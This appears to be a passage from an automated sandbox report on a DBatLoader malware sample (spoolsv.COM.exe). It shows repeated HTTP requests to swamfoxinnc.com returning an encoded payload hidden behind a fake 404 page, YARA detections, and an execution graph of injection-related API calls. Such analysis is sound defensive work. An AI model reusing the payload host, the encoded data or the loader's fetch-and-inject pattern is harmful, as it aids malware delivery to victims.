                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:29 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:29 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.1050012176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:31 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:32 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:32 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:32 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:32 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:32 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:32 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.2.1050023176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:34 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:35 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:35 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:35 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:36 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:36 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:36 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            34192.168.2.1050031176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:38 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:39 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:39 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:39 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:39 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:40 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Target ID:5
                                                                            Start time:01:37:36
                                                                            Start date:23/12/2024
                                                                            Path:C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\spoolsv.COM.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'019'392 bytes
                                                                            MD5 hash:DFD15A4158AB979660435D6F3E95A3EC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000005.00000002.2514939063.0000000002286000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000005.00000003.1272909901.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000005.00000002.2531784448.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:7%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:16.2%
                                                                              Total number of Nodes:241
                                                                              Total number of Limit Nodes:9
                                                                              execution_graph 25300 2b4bb44 25303 2b3ec74 25300->25303 25304 2b3ec7c 25303->25304 25304->25304 28487 2b3870c LoadLibraryW 25304->28487 25306 2b3ec9e 28492 2b22ee0 QueryPerformanceCounter 25306->28492 25308 2b3eca3 25309 2b3ecad InetIsOffline 25308->25309 25310 2b3ecb7 25309->25310 25311 2b3ecc8 25309->25311 28504 2b24500 25310->28504 25313 2b24500 11 API calls 25311->25313 25314 2b3ecc6 25313->25314 28495 2b2480c 25314->28495 28510 2b380c8 28487->28510 28489 2b38745 28521 2b37d00 28489->28521 28493 2b22ef8 GetTickCount 28492->28493 28494 2b22eed 28492->28494 28493->25308 28494->25308 28496 2b2481d 28495->28496 28497 2b24843 28496->28497 28498 2b2485a 28496->28498 28499 2b24b78 11 API calls 28497->28499 28500 2b24570 11 API calls 28498->28500 28502 2b24850 28499->28502 28500->28502 28501 2b2488b 28502->28501 28503 2b24500 11 API calls 28502->28503 28503->28501 28505 2b24504 28504->28505 28507 2b24514 28504->28507 28505->28507 28508 2b24570 11 API calls 28505->28508 28506 2b24542 28506->25314 28507->28506 28595 2b22c2c 11 API calls 28507->28595 28508->28507 28511 2b24500 11 API calls 28510->28511 28512 2b380ed 28511->28512 28535 2b37914 28512->28535 28516 2b38107 28517 2b3810f GetModuleHandleW GetProcAddress GetProcAddress 28516->28517 28518 2b38142 28517->28518 28556 2b244d0 28518->28556 28522 2b24500 11 API calls 28521->28522 28523 2b37d25 28522->28523 28524 2b37914 12 API calls 28523->28524 28525 2b37d32 28524->28525 28526 2b24798 11 API calls 28525->28526 28527 2b37d42 28526->28527 28584 2b38020 28527->28584 28530 2b380c8 15 API calls 28531 2b37d5b NtWriteVirtualMemory 28530->28531 28532 2b37d87 28531->28532 28533 2b244d0 11 API calls 28532->28533 28534 2b37d94 FreeLibrary 28533->28534 28534->25306 28536 2b37925 28535->28536 28560 2b24b78 28536->28560 28538 2b379a1 28541 2b24798 28538->28541 28539 2b37935 28539->28538 28569 2b2ba44 CharNextA 28539->28569 28542 2b2479c 28541->28542 28543 2b247fd 28541->28543 28544 2b24500 28542->28544 28545 2b247a4 28542->28545 28546 2b24514 28544->28546 28550 2b24570 11 API calls 